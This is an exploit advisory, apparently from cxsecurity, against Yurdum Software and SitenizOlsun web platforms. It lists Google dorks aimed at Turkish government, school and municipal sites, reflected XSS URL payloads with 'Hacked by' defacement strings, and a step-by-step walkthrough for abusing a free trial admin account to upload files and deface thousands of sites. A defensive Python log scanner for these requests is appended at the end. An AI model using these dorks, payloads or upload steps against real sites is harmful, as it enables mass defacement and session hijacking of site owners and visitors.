Yurdum Software Reflected XSS Privilege Escalation

2019.06.17
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-284

###################################################################
# Exploit Title : Yurdum Software Reflected XSS Privilege Escalation
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 17/06/2019
# Vendor Homepages : yurdumyazilim.com ~ sitenizolsun.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type :
# CWE-79 [ Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') ]
# CWE-671 [ Lack of Administrator Control over Security ]
# CWE-522 [ Insufficiently Protected Credentials ]
# CWE-284 [ Improper Access Control ]
# CWE-285 [ Improper Authorization ]
# Google Dorks :
# inurl:/?pnum= intext:Yer sağlayıcı: Yurdum Yazılım site:tr
# inurl:/?pnum= intext:Yer sağlayıcı: SitenizOlsun. site:tr
# intext:Yer sağlayıcı: SitenizOlsun site:tr
# intext:Yer sağlayıcı: Yurdum Yazılım site:tr
# inurl:/?pnum= site:tr
# inurl:/?pnum= site:gov.tr
# inurl:/?pnum= site:bel.tr
# inurl:/?pnum= site:k12.tr
# inurl:/?pnum= site:org.tr
# inurl:/?pnum= site:com.tr
# inurl:/?pnum= site:com
# inurl:/?pnum= site:net
# inurl:/?pnum= site:org
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/ascii/WLB-2019010038
###################################################################

Impact 1 Reflected XSS Cross Site Scripting (or Non-Persistent) :
*********************************************************

The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.

URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected site and allow the attacker to access sensitive browser-based information. An attacker, for example, can exploit this vulnerability to steal cookies from the attacked user in order to hijack a session and gain access to the system.

Impact 2 Lack of Administrator Control over Security :
***********************************************

The product uses security features in a way that prevents the product's administrator from tailoring security settings to reflect the environment in which the product is being used. This introduces resultant weaknesses or prevents it from operating at the level of security that is desired by the administrator. A related weakness occurs when the application transmits or stores authentication credentials using an insecure method that is susceptible to unauthorized interception and/or retrieval. The software also does not perform, or incorrectly performs, an authorization check when an actor attempts to access a resource or perform an action. An attacker could gain access to user accounts and to the sensitive data used by those accounts.
###################################################################
# Reflected Cross Site Scripting XSS Exploits and Payloads :
*******************************************************

1%27<marquee><font%20color=lime%20size=32>XSS-Vulnerability-Found-By-KingSkrupellos</font></marquee>

1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20KingSkrupellos%3C/font%3E%3C/marquee%3E

/?pnum=1&pt=1%27"></h3></tr></td></table></tr></td></table></div><marquee>XSS-Vulnerability-Found-By-KingSkrupellos

/?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>KingSkrupellos</font></marquee>

/?pnum=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?pnum=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?SyfNmb=3&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?SyfNmb=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?Syf=4&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?Syf=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?product=1&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

/?product=[ID-NUMBER]&pt=1%27<marquee><font%20color=lime%20size=32>Hacked%20by%20KingSkrupellos</font></marquee>

# Add Administrator / Privilege Escalation Vulnerability :
***********************************************

To Take Administrator Account

Register to sitenizolsun.com => Click " Ücretsiz Dene " [ Try Free ]

Then you will be redirected to this address.

sitenizolsun.com/website-temalari?paket=6
sitenizolsun.com/website-temalari?paket=[ID-NUMBER]

Choose one package which you want.

sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=6&paket=6
sitenizolsun.com/website-ucretsiz-deneme-form.php?website-theme=[ID-NUMBER]&paket=[ID-NUMBER]

Ücretsiz Deneme Web Siteni Oluştur [ Create your Free Test Account ]

Create any random username - Create a random or your real e-mail address - Create a title - Random phone number

Then click " Sitemi Oluştur " [ Create My Website ]. Please wait. It will create a test site and an administrator e-mail address and password.

http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com

Yönetim paneli kullanıcı adınız: YOUR ADMINISTRATOR E-MAIL ADDRESS HERE [ Your admin panel username ]
Yönetim paneli şifreniz : YOUR ADMINISTRATOR PASSWORD HERE [ Your admin panel password ]

Administrator Login Path :
/login/
/login/do_login.php

One free test website - but you can control approximately 9397 websites at the same time.

You can upload files to the vulnerable system.

Step 1 : Go to " Temel Sayfalar " [ Main Pages ] => Anasayfa [ Homepage ]
Step 2 : Click " Anasayfayı Düzenle " [ Edit Homepage ]
Step 3 : Choose " Resim Ekle " [ Insert Image ] => Click " Kaynak " [ Source ]
Step 4 : /syp/dosyayukle.php?DosyaTipi=2
http://[TEST-TARGET-WEBSITE-HERE].denemepaketi.com/syp/dosyayukle.php?DosyaTipi=2
You will see a yellow and white page and it says :
Step 5 : Yüklemek istediğiniz dosyaları "Gözat"a tıklayarak bilgisayarınızdan seçiniz ve "Yükle" ye tıklayınız. [ Select the files you want to upload from your computer by clicking "Browse" and click "Upload". ]
Step 6 : Choose " Sayfaya sığdır (Resimler için geçerli) Max 30 MB " [ Fit to page (applies to images) Max 30 MB ]
Step 7 : Choose your .html file from your PC and upload it. But choose HTML. Click the " Yükle " [ Upload ] button.
Your File Destination :
/FileUpload/epXXXXXX/File/[yourfilename.html]

If you use other sections such as " Add Header Image " or " Add Album ", your file destination is :
/FileUpload/epXXXXXX/HeaderImages/crop/[RANDOM-NUMBERS].jpg
/FileUpload/epXXXXXX/Album/epXXXXXX_[YEAR][MONTH][DAY][RANDOM-NUMBERS].jpg

You can see your defaced indexes on 9397 websites at the same time. Congratulations :)

###################################################################
# Example Vulnerable Sites for XSS Reflected Cross Site Scripting :
***********************************************************

###################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
###################################################################
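As an added defender-side example (not part of the advisory and not vendor code), the following Python scans web-server access-log lines for the two request patterns the advisory describes: the pt, pnum, SyfNmb, Syf and product parameters carrying HTML tags once URL-decoded (the reflected XSS probes, including double-encoded ones), and requests to the /syp/dosyayukle.php upload endpoint. The sample log lines, client addresses and alert labels are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Query parameters the advisory lists as reflected into the page.
REFLECTED_PARAMS = {"pt", "pnum", "SyfNmb", "Syf", "product"}
# Upload endpoint named in the advisory's walkthrough.
UPLOAD_PATH = "/syp/dosyayukle.php"
# Any HTML tag after decoding; the advisory's payloads use <marquee>/<font>.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")
# Request target out of a common/combined access-log line.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded payloads are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target):
    """Return alert labels for one request target (path plus query)."""
    parts = urlsplit(target)
    alerts = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name in REFLECTED_PARAMS and any(TAG_RE.search(decode_fully(v)) for v in values):
            alerts.append("xss-probe:" + name)
    if parts.path == UPLOAD_PATH:
        alerts.append("file-upload-endpoint")
    return alerts


def scan_log(text):
    """Scan access-log text; return (target, alert) pairs in log order."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if m:
            hits.extend((m.group("target"), a) for a in inspect_request(m.group("target")))
    return hits


# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [17/Jun/2019:10:01:02 +0300] "GET /?pnum=1&pt=1 HTTP/1.1" 200 5120
203.0.113.5 - - [17/Jun/2019:10:01:09 +0300] "GET /?pnum=1&pt=1%27%3Cmarquee%3EXSS%3C/marquee%3E HTTP/1.1" 200 5210
198.51.100.7 - - [17/Jun/2019:10:02:30 +0300] "GET /syp/dosyayukle.php?DosyaTipi=2 HTTP/1.1" 200 900
"""
```

Running scan_log(SAMPLE_LOG) yields one xss-probe:pt hit for the second line and one file-upload-endpoint hit for the third; the plain first request produces nothing.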


Copyright 2019, cxsecurity.com